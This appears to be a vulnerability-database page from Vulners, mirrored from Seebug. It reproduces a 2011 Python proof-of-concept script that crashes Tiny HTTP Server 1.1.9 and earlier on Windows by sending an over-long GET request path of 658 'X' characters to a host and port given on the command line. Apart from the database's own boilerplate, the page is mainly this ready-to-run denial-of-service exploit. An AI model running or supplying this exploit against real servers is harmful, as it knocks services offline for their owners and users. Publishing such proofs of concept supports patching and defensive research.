Lucene search
K

Tiny HTTP Server <= 1.1.9 - Remote Crash PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Tiny HTTP Server v1.1.9 Remote Crash PoC by localh0t - Windows Targets

Code

                                                #!/usr/bin/python

# Tiny HTTP Server &#60;=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: [email protected]
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)

import httplib,sys

if (len(sys.argv) &#60; 3):
	print &#34;\nTiny HTTP Server &#60;=v1.1.9 Remote Crash PoC&#34;
        print &#34;\n	Usage: %s &#60;host&#62; &#60;port&#62; \n&#34; %(sys.argv[0])
	sys.exit()

payload = &#34;X&#34; * 658

try:
	print &#34;\n[!] Connecting to %s ...&#34; %(sys.argv[1])
	httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
	httpServ.connect()
	print &#34;[!] Sending payload...&#34;
	httpServ.request(&#39;GET&#39;, &#34;/&#34; + str(payload))
	print &#34;[!] Exploit succeed. Check %s if crashed.\n&#34; %(sys.argv[1])
except:
	print &#34;[-] Connection error, exiting...&#34;

httpServ.close()
sys.exit()
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
10